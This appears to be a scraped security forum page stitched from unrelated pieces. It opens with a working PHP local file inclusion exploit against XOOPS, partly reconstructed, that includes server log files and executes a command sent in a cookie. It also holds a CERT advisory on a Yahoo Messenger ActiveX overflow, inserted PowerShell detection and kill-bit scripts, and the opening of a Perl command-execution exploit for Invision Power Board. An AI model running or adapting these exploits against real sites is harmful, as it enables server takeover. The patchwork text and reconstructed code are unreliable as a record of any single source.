<?php
// Tail of a XOOPS xoopsOption[nocommon] local file inclusion exploit. The page
// starts mid-file: argument parsing, the sendpacketii() helper and the first
// entries of $paths are missing. The definitions below are filled in only so
// that the fragment runs; they are assumptions, not the original code.
$host = isset($argv[1]) ? $argv[1] : 'localhost';  // target host (assumed argv layout)
$p    = isset($argv[2]) ? $argv[2] : '/';          // path to the XOOPS install
$cmd  = isset($argv[3]) ? $argv[3] : 'id';         // command sent in the cmd cookie
$port = 80;
$html = '';
// Minimal stand-in for the missing sendpacketii(): send the raw request to
// $host:$port and leave the full response in the global $html.
function sendpacketii($packet)
{
  global $host, $port, $html;
  $ock = fsockopen($host, $port, $errno, $errstr, 10);
  if (!$ock) { die("No response from ".$host.": ".$errstr."\r\n"); }
  fputs($ock, $packet);
  $html = '';
  while (!feof($ock)) { $html .= fread($ock, 8192); }
  fclose($ock);
}
// Log files to include; the "../" segments walk from the web root up to /.
$paths = array(
  "../../../../../../../../../var/log/access_log",
  "../../../../../../../../../var/log/error_log"
);
$xpl = array(
  "misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=",
  "index.php?xoopsOption[nocommon]=1&xoopsConfig[theme_set]="
);
for ($j=0; $j<=count($xpl)-1; $j++)
{
  for ($i=0; $i<=count($paths)-1; $i++)
  {
    $a=$i+2;
    echo "[".$a."] Trying with: ".$xpl[$j].$paths[$i]."%00\r\n";
    $packet ="GET ".$p.$xpl[$j].$paths[$i]."%00 HTTP/1.0\r\n";
    $packet.="Host: ".$host."\r\n";
    $packet.="Cookie: cmd=".$cmd.";\r\n";
    $packet.="Connection: Close\r\n\r\n";
    #debug
    #echo quick_dump($packet);
    sendpacketii($packet);
    // a response carrying *delim* means the included file executed the planted code
    if (strstr($html,"*delim*"))
    {
      echo "Exploit succeeded \r\n";
      $temp=explode("*delim*",$html);
      die($temp[1]);
    }
  }
}
//if you are here
echo "Exploit failed ";
?>
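Added example, not part of the exploit post above and not the exploit author's code: detection logic for the request shape the script sends (xoopsOption[nocommon]=1, a traversal or absolute value for xoopsConfig[language] or xoopsConfig[theme_set], a trailing %00), run over Apache "combined" log lines. The log lines are constructed for this example, the function and field names are mine, and the fourth indicator (a PHP open tag in a client header) covers the log-seeding stage that this page does not show.

```powershell
# Added example, not part of the exploit post: flag XOOPS nocommon inclusion
# attempts in Apache "combined" access logs. Sample lines are constructed.
$SampleLog = @'
203.0.113.7 - - [10/Dec/2006:10:01:02 +0000] "GET /xoops/index.php HTTP/1.0" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Dec/2006:10:01:04 +0000] "GET /xoops/ HTTP/1.0" 200 5120 "-" "<?php phpinfo(); ?>"
203.0.113.7 - - [10/Dec/2006:10:01:05 +0000] "GET /xoops/misc.php?xoopsOption[nocommon]=1&xoopsConfig[language]=../../../../../../../../../var/log/access_log%00 HTTP/1.0" 200 812 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Dec/2006:10:01:07 +0000] "GET /xoops/index.php?xoopsOption%5Bnocommon%5D=1&xoopsConfig%5Btheme_set%5D=/var/log/error_log%00 HTTP/1.0" 200 1640 "-" "Mozilla/4.0"
'@

# Apache combined format: ip ident user [time] "request" status bytes "referer" "user-agent"
$CombinedLine = '^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<method>\S+) (?<url>\S+) [^"]*" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<ua>[^"]*)"$'

function Test-XoopsNocommonAttempt {
    param([Parameter(Mandatory)][string]$Line)
    $m = [regex]::Match($Line, $CombinedLine)
    if (-not $m.Success) { return $null }
    $rawUrl = $m.Groups['url'].Value
    $url    = [uri]::UnescapeDataString($rawUrl)     # normalise %5B / %5D encodings
    $reasons = @()
    # 1. the switch that makes XOOPS skip its normal bootstrap for this request
    if ($url -match 'xoopsOption\[nocommon\]=1') { $reasons += 'nocommon bypass' }
    # 2. the two config keys the exploit feeds, pointed outside the XOOPS tree
    if ($url -match 'xoopsConfig\[(language|theme_set)\]=(\.\./|/)') { $reasons += 'config key points outside XOOPS' }
    # 3. the null byte that cuts off whatever XOOPS appends to the path (PHP before 5.3.4)
    if ($rawUrl -match '%00') { $reasons += 'null-byte truncation' }
    # 4. a PHP open tag in a client-controlled header: the usual way a log file is
    #    seeded before it is included (that stage of the exploit is not on this page)
    if ($m.Groups['ua'].Value -match '<\?php' -or $m.Groups['referer'].Value -match '<\?php') { $reasons += 'log poisoning payload' }
    if ($reasons.Count -eq 0) { return $null }
    [pscustomobject]@{
        Source  = $m.Groups['ip'].Value
        Time    = $m.Groups['time'].Value
        Request = $rawUrl
        Reasons = ($reasons -join ', ')
    }
}

$SampleLog -split "`r?`n" | Where-Object { $_ } |
    ForEach-Object { Test-XoopsNocommonAttempt -Line $_ } |
    Where-Object { $_ } | Format-Table -AutoSize
```

The first sample line is a normal request and produces nothing; the other three each come back with one or more reasons. Matching on the decoded URL but checking %00 on the raw one is deliberate: the null byte is only meaningful in its encoded form, while the bracket encodings vary between clients.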
micimacko(HCE)
Yahoo Messenger YMailAttach ActiveX control buffer overflow
Source: http://www.kb.cert.org/vuls/id/901852
Vulnerability Note VU#901852
Yahoo Messenger YMailAttach ActiveX control buffer overflow
Overview
The Yahoo Messenger YMailAttach ActiveX control contains a buffer overflow, which could allow a remote, unauthenticated attacker to execute arbitrary code on a vulnerable system.
I. Description
Yahoo Messenger is an instant messaging application. Yahoo Messenger includes several ActiveX controls. The YMailAttach ActiveX control, which is provided by ymmapi.dll, contains a buffer overflow vulnerability.
II. Impact
By convincing a user to view a specially crafted HTML document (e.g., a web page or an HTML email message or attachment), an attacker may be able to execute arbitrary code with the privileges of the user. The attacker could also cause Internet Explorer (or the program using the WebBrowser control) to crash.
III. Solution
Apply an update
As specified in the Yahoo Security Update, this issue is addressed in versions of Yahoo Messenger from Nov 2nd 2006 or later. Version 2005.1.1.4 or higher of ymmapi.dll contains the fix.
Disable the YMailAttach ActiveX control in Internet Explorer
The Yahoo YMailAttach ActiveX control can be disabled in Internet Explorer by setting the kill bit for the following CLSID:
{AA218328-0EA8-4D70-8972-E987A9190FF4}
More information about how to set the kill bit is available in Microsoft Support Document 240797. Alternatively, the following text can be saved as a REG file and imported to set the kill bit for this control:
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{AA218328-0EA8-4D70-8972-E987A9190FF4}]
"Compatibility Flags"=dword:00000400
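Added example, not from the CERT note and not Yahoo's or Microsoft's code: a scripted equivalent of the .reg file above that sets the kill bit for the YMailAttach CLSID and then reads it back to verify it. It assumes an elevated PowerShell prompt; the Wow6432Node key is included because 32-bit Internet Explorer on 64-bit Windows consults that view, and the function names are mine.

```powershell
# Added example (not from VU#901852): set and verify the IE kill bit for the
# YMailAttach CLSID. Run from an elevated prompt.
$Clsid   = '{AA218328-0EA8-4D70-8972-E987A9190FF4}'   # CLSID from the advisory
$KillBit = 0x400                                       # the Compatibility Flags value in the .reg file

function Get-ActiveXCompatKey {
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    # 32-bit IE on 64-bit Windows reads the Wow6432Node view
    $base = if ($Wow64) { 'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility' }
            else        { 'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility' }
    Join-Path -Path $base -ChildPath $Clsid
}

function Get-ActiveXCompatFlags {
    param([Parameter(Mandatory)][string]$Key)
    if (-not (Test-Path -Path $Key)) { return 0 }
    $item = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.'Compatibility Flags'
}

function Set-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    $key = Get-ActiveXCompatKey -Clsid $Clsid -Wow64:$Wow64
    if (-not (Test-Path -Path $key)) { New-Item -Path $key -Force | Out-Null }
    # OR the kill bit into whatever flags are already present rather than
    # overwriting them, which is what importing the .reg file would do.
    $flags = (Get-ActiveXCompatFlags -Key $key) -bor $KillBit
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $flags -Type DWord
}

function Test-ActiveXKillBit {
    param([Parameter(Mandatory)][string]$Clsid, [switch]$Wow64)
    $key = Get-ActiveXCompatKey -Clsid $Clsid -Wow64:$Wow64
    return (((Get-ActiveXCompatFlags -Key $key) -band $KillBit) -ne 0)
}

$views = @(@{ Wow64 = $false })
if ([Environment]::Is64BitOperatingSystem) { $views += @{ Wow64 = $true } }
foreach ($v in $views) {
    Set-ActiveXKillBit -Clsid $Clsid -Wow64:$v.Wow64
    if (Test-ActiveXKillBit -Clsid $Clsid -Wow64:$v.Wow64) {
        "Kill bit set for $Clsid (Wow64=$($v.Wow64))"
    } else {
        throw "Kill bit verification failed for $Clsid (Wow64=$($v.Wow64))"
    }
}
```

Test-ActiveXKillBit is the check worth keeping around: it reads the value back from the registry instead of trusting that the write succeeded, and it tests the 0x400 bit rather than comparing the whole DWORD, so a control that already carried other compatibility flags still reports correctly.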
Disable ActiveX
Disabling ActiveX controls in the Internet Zone (or any zone used by an attacker) appears to prevent exploitation of this and other ActiveX vulnerabilities.
Instructions for disabling ActiveX in the Internet Zone can be found in the "Securing Your Web Browser" document.
Systems Affected
Vendor Status Date Updated
Yahoo, Inc. Vulnerable 15-Dec-2006
References
http://www.cert.org/tech_tips/securi ernet_Explorer
http://messenger.yahoo.com/security_ php?id=120806
Credit
Thanks to Yahoo for reporting this vulnerability.
This document was written by Will Dormann.
Other Information
Date Public 12/08/2006
Date First Published 12/15/2006 02:31:05 PM
Date Last Updated 12/15/2006
CERT Advisory
CVE Name
Metric 27.94
Document Revision 5
Langtuhaohoa(HCE)
Invision Power Board Multiple Vulnerabilities (post 1)
Quote:
Release Date: 2006-04-26
Critical: Highly critical
Impact: Security Bypass
Cross Site Scripting
Manipulation of data
System access
Where: From remote
Solution Status: Vendor Patch
Software: Invision Power Board 2.x
Hot stuff here.
Tested on versions 2.0.3 and 2.1.4.
Assessment: extremely dangerous!
It can be used to hack the forum, or the server (if it is poorly secured!). Webmasters are advised to apply the patch right away!
Exploit video:
Quote:
Video
Exploit code (Perl):
Code:
#!/usr/bin/perl
## Invision Power Board 2.* commands execution exploit by RST/GHC
## vulnerable versions <= 2.1.5
## tested on 2.1.4, 2.0.2
##
## (c)oded by 1dt.w0lf
## RST/GHC
## http://rst.void.ru
## http://ghc.ru
use IO::Socket;
use Getopt::Std;
getopts("l:h:p:d:f:v:");
$host = $opt_h;